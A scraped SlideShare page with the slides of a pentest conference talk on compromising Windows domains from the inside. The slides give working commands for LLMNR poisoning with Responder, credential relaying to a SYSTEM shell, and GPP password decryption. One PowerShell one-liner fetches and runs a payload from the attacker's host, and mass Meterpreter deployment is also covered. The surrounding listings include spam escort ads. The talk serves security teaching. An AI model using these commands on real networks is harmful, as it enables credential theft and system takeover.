import pybr12: experiencias de inclusión en la última PyCon Brazil
 
The Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to CompromiseThe Travelling Pentester: Diaries of the Shortest Path to Compromise
The Travelling Pentester: Diaries of the Shortest Path to Compromise
 
Hackeando Dados públicos com python
Hackeando Dados públicos com pythonHackeando Dados públicos com python
Hackeando Dados públicos com python
 
iOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic TechniquesiOS Hacking: Advanced Pentest & Forensic Techniques
iOS Hacking: Advanced Pentest & Forensic Techniques
 
Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]Mobile Application Pentest [Fast-Track]
Mobile Application Pentest [Fast-Track]
 

Similar to MAIOR FESTIVAL HACKER DA AMÉRICA LATINA

Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliPriyanka Aash
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020Jose Palanco
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsShakacon
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessEC-Council
 
[ENG] IPv6 shipworm + My little Windows domain pwnie
[ENG] IPv6 shipworm + My little Windows domain pwnie[ENG] IPv6 shipworm + My little Windows domain pwnie
[ENG] IPv6 shipworm + My little Windows domain pwnieZoltan Balazs
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Priyanka Aash
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...Zoltan Balazs
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPRISMA CSI
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksMauricio Velazco
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!NETWAYS
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Rodolpho Concurde
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxAmitesh Bharti
 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyZoltan Balazs
 
Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guideCraig Cannon
 
Getting started kali linux
Getting started kali linuxGetting started kali linux
Getting started kali linuxDhruv Sharma
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopErnest Staats
 

Similar to MAIOR FESTIVAL HACKER DA AMÉRICA LATINA (20)

Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteliDefcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
Defcon 22-zoltan-balazs-bypass-firewalls-application-whiteli
 
Penetration Testing Boot CAMP
Penetration Testing Boot CAMPPenetration Testing Boot CAMP
Penetration Testing Boot CAMP
 
OT Security - h-c0n 2020
OT Security - h-c0n 2020OT Security - h-c0n 2020
OT Security - h-c0n 2020
 
Wielding a cortana
Wielding a cortanaWielding a cortana
Wielding a cortana
 
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan BalazsHacking Highly Secured Enterprise Environments by Zoltan Balazs
Hacking Highly Secured Enterprise Environments by Zoltan Balazs
 
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote AccessHacker Halted 2014 - Post-Exploitation After Having Remote Access
Hacker Halted 2014 - Post-Exploitation After Having Remote Access
 
[ENG] IPv6 shipworm + My little Windows domain pwnie
[ENG] IPv6 shipworm + My little Windows domain pwnie[ENG] IPv6 shipworm + My little Windows domain pwnie
[ENG] IPv6 shipworm + My little Windows domain pwnie
 
Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.Breaking Smart Speakers: We are Listening to You.
Breaking Smart Speakers: We are Listening to You.
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
 
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team PlaybooksSANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
SANS Purple Team Summit 2021: Active Directory Purple Team Playbooks
 
Ethical hacking
Ethical hackingEthical hacking
Ethical hacking
 
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
stackconf 2021 | Fuzzing: Finding Your Own Bugs and 0days!
 
Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0Fuzzing: Finding Your Own Bugs and 0days! 2.0
Fuzzing: Finding Your Own Bugs and 0days! 2.0
 
Threats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in LinuxThreats, Vulnerabilities & Security measures in Linux
Threats, Vulnerabilities & Security measures in Linux
 
How to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ DisobeyHow to hide your browser 0-day @ Disobey
How to hide your browser 0-day @ Disobey
 
Linux security quick reference guide
Linux security quick reference guideLinux security quick reference guide
Linux security quick reference guide
 
Getting started kali linux
Getting started kali linuxGetting started kali linux
Getting started kali linux
 
FBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise WorkshopFBI & Secret Service- Business Email Compromise Workshop
FBI & Secret Service- Business Email Compromise Workshop
 
Bsides final
Bsides finalBsides final
Bsides final
 

Recently uploaded

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024The Digital Insurer
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreternaman860154
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsEnterprise Knowledge
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Drew Madelung
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 

Recently uploaded (20)

08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Presentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreterPresentation on how to chat with PDF using ChatGPT code interpreter
Presentation on how to chat with PDF using ChatGPT code interpreter
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
IAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI SolutionsIAC 2024 - IA Fast Track to Search Focused AI Solutions
IAC 2024 - IA Fast Track to Search Focused AI Solutions
 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
Strategies for Unlocking Knowledge Management in Microsoft 365 in the Copilot...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024Tata AIG General Insurance Company - Insurer Innovation Award 2024
Tata AIG General Insurance Company - Insurer Innovation Award 2024
 
Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 

MAIOR FESTIVAL HACKER DA AMÉRICA LATINA

  • 1. O MAIOR FESTIVAL HACKER DA AMÉRICA LATINA
  • 2. Internal Pentest From z3r0 to h3r0 by Márcio "pimps" Almeida
  • 3. Internal Pentest From z3r0 to h3r0 – Márcio Almeida * Disclaimer * • Slides in english but I’ll speak in Portuguese. • That presentation don’t have any tool created or invented by me, only how I use "well known" tools and how I can automatize their use... • On this presentation I’ll only talk about ideas and tricks that I personally use during Internal penetration test engagements. 3
  • 4. Internal Pentest From z3r0 to h3r0 – Márcio Almeida whoami • a.k.a Pimps • CTF Player (web and crypto) • Proud Member of TheGoonies CTF Team • Check our writeups at: https://thegoonies.rocks • Penetration Tester (+7 years) • Tempest, Cipher, SpiderLabs and Securus Global • Previous Presentations • Black Hat SP, BSides LV, Ekoparty, Thotcon, AlligatorCon, YSTS… 22/11/16 4
  • 5. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Scenario we will talk about • Internal Penetration Testing • 100% Black Box (Plug and Play) • Time constriction (3-5 days) • Without “low-hanging fruits” • Anti-virus and some other protections in place 22/11/16 5
  • 6. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Agenda • Unfortunately we have only 40m so I choose: • Reconnaissance Tricks on Blackbox Testing • LLMNR and NBT-NS Poisoning • GPOs / GPPs • Shellcode Execution - SCE 6
  • 7. Internal Pentest From z3r0 to h3r0 – Márcio Almeida RECONNAISSANCE TRICKS ON BLACKBOX TESTING 7
  • 8. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Domain Computer Accounts • First enumerate all Domain Controllers: • nslookup • ping domain_name • dsquery • Etc… • Use enum4linux to enumerate all users on the domain (if null session is enabled or using a cred). • Extract all machine usernames (accounts with $ on the username, like: user$) • Nmap all those userX$.domain_name to get their IP addresses and open ports. Repeat the nmap process in all different subnets. 22/11/16 8
  • 9. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Identifying “Live Subnets” • You don’t need scan all IPs to identify live subnets… • Scan well known IP address with well known ports to identify live addresses in subnets: • x.x.x.1, x.x.x.101, x.x.x.192, x.x.x.201, x.x.x.253, x.x.x.254 • Scan common ports: 21, 22, 23, 25, 53, 80, 443, 445, 3389 22/11/16 9
  • 10. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Identifying “Live Hosts” • Once you find a subnet with a live IP, then scan the whole subnet with a tuned nmap command: • nmap -A -T4 -n -top-ports 1000 -- max-rtt-timeout=500ms --initial-rtt- timeout=200ms --min-rtt- timeout=200ms --open --stats-every 5s x.x.x.0/24 22/11/16 10
  • 11. Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR AND NBT-NS POISONING 11
  • 12. Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR and NBT-NS Poisoning • The victim machine wants to go to print server at printserver, but mistakenly types in pintserver. • The DNS server responds to the victim saying that it doesn’t know that host. • The victim then asks if there is anyone on the local network that knows the location of pintserver • The attacker responds to the victim saying that he actually is the pintserver • The victim believes the attacker and sends its own username and NTMLv2 hash to the attacker. • The attacker can now crack the hash to discover the password 12
  • 13. Internal Pentest From z3r0 to h3r0 – Márcio Almeida LLMNR and NBT-NS Poisoning 13
  • 14. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder by @lgandx https://github.com/lgandx/Responder • Performs LLMNR/NBT-NS/mDNS poisoning in a easy and highly effective way and stores the captured hashes and clear-text credentials into files. • Pre-requisites: Install Python • git clone https://github.com/lgandx/Responder.git • cd Responder • ./Responder.py -I eth0 –rPv • Use john or hashcat to crack the captured NTMLv2 hashes via dictionary attack… If you don’t have a good wordlist you can use the rockyou.txt. Works well to me in most ocasions... 14
  • 15. Internal Pentest From z3r0 to h3r0 – Márcio Almeida DEMO Responder by @lgandx https://www.youtube.com/watch?v=mgAHX4h1ojI 15
  • 16. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + Proxenet by @hugsy https://proxenet.readthedocs.io/en/dev/mitm/ • Use Responder to spoof NetBIOS packets and poison local network Windows workstation WPAD configuration, and redirect traffic to our evil box. • Add the plugin oPhishPoison.py to the autoload directory of proxenet and start it. • ln -sf proxenet-plugins/oPhishPoison.py proxenet- plugins/autoload/oPhishPoison.py • ./proxenet -b YOUR_IP -p 8008 -i –N • From the moment proxenet and Responder are configured and running, fake LLMNR and WPAD responses will be sent to the victims. By default, the loaded plugin will replace known binary content types (such as Office documents, ZIP files, RAR archives, etc.) with PE executables containing your payloads. • Please visit the link for detailed configuration. 16
  • 17. Internal Pentest From z3r0 to h3r0 – Márcio Almeida DEMO Responder + Proxenet by @hugsy https://www.youtube.com/watch?v=eN_HwFkyYyw 17
  • 18. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Quick Overview: SMBRelay 18
  • 19. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + MultiRelay http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html • MultiRelay was built to work in conjunction with Responder.py, the common usage scenario is: • Set SMB and HTTP to Off in Responder.conf • ./Responder.py -I eth0 -rv (on one screen) • ./tools/MultiRelay.py -t Target_IP -u Administrator/Daaccount/OtherAdmin/ALL (on another screen). 19
  • 20. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Responder + MultiRelay http://g-laurent.blogspot.com.br/2016/10/introducing-responder-multirelay-10.html • Once a relay has been successful, MultiRelay will give you an interactive shell allowing you to: • Remotely dump the LM and NT hashes on the target (that you can pass-the-hash after) • Remotely dump any registry keys under HKLM (sensitive information and configurations) • Read any file on the target. • Download any file on the target. • Execute any command as System on the target. 20
  • 21. Internal Pentest From z3r0 to h3r0 – Márcio Almeida MultiRelay DEMO by @lgandx https://www.youtube.com/watch?v=c5GT9pAtnIw 21
  • 22. Internal Pentest From z3r0 to h3r0 – Márcio Almeida GPO – GROUP POLICY OBJECT GPP – GROUP POLICY PROPERTIES 22
  • 23. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Group Policies (GPO) • SYSVOL is a share present on the Domain Controllers to which all authenticated users have read access. • SYSVOL contains logon scripts, group policy data, and other domain-wide data which needs to be available anywhere. • All domain Group Policies are stored here: • <DOMAIN_CONTROLLER>SYSVOL<DOMAIN_NAME>Policies 23
  • 24. Internal Pentest From z3r0 to h3r0 – Márcio Almeida 24 Clear-text Credentials on SYSVOL
  • 25. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Group Policy Preferences (GPP) • In 2006, Microsoft Bought Desktop Standard’s “PolicyMaker” which they re-branded & released with Windows Server 2008 as “Group Policy Preferences.” • One of the most useful features of Group Policy Preferences (GPP) is the ability to store and use credentials in several scenarios (change local admin password, configure prints, configure shares, configure services, etc). • Those credentials are stored Encrypted. They are encrypted with AES-256 which should be good enough… But… 25
  • 26. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Thanks Microsoft ;-* 26 https://msdn.microsoft.com/en-us/library/cc422924.aspx
  • 27. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Decrypting GPP cpassword 27 https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1 root@kali:~# gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw Local*P4ssword!
  • 28. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Metasploit Module GPP 28
  • 29. Internal Pentest From z3r0 to h3r0 – Márcio Almeida SHELLCODE EXECUTION - SCE 29
  • 30. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Shellcode Execution - SCE • HIGHLY EFFECTIVE for anti-virus bypass • My own experience: worked perfectly 100% of the times that I needed use. • Works beautifully using winexe or psexec (God bless the Pass the Hash :-P) • Using a Domain Admin account is possible automatize the Mass p0wn4g3 on the network “scripting” the command reading the targets from a list. • Using a Meterpreter script you can also automatize the capture of evidences on all compromised machines (screenshot, ifconfig, hashdump, mimikatz, getinfo, etc…) 30
  • 31. Internal Pentest From z3r0 to h3r0 – Márcio Almeida Shellcode Execution - SCE • Using Microsoft PowerShell is possible download the binary (wget like style) to a temporary directory, execute it and erase the file after: • On Attacker machine execute: python –m SimpleHTTPServer • Will enable http://YOUR_MACHINE:8000/ on Attacker machine • winexe --user=DOMAIN/USER%HASH_OR_PASSWORD //TARGET "cmd /c "del teste.bat & echo powershell -c "(new- object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE :8000/sce.32.exe','sce.32.exe')" >> teste.bat & echo powershell -c "(new-object System.Net.WebClient).DownloadFile('http://YOUR_MACHINE :8000/hack.bat','hack.bat')" >> teste.bat & echo hack.bat >> teste.bat & teste.bat"" 31
  • 32. Internal Pentest From z3r0 to h3r0 – Márcio Almeida SCEPWN-NG by @joshuaskorich https://github.com/joshuaskorich/scepwn-ng • Using a samba share you can execute the binary directly from the sharing folder injecting the meterpreter session directly on memory without any file ever touch the disk! • Details of how configure the environment on scepwn-ng github. • After configure your environment, and get a privileged account, just execute: • ./scepwn-ng.rb -u 'username%password_or_hash' -t TARGET • If you put this command in a loop to read from a list of targets and use a Meterpreter script to automatize commands on targets, it becomes a mass auto-pwn tool. 32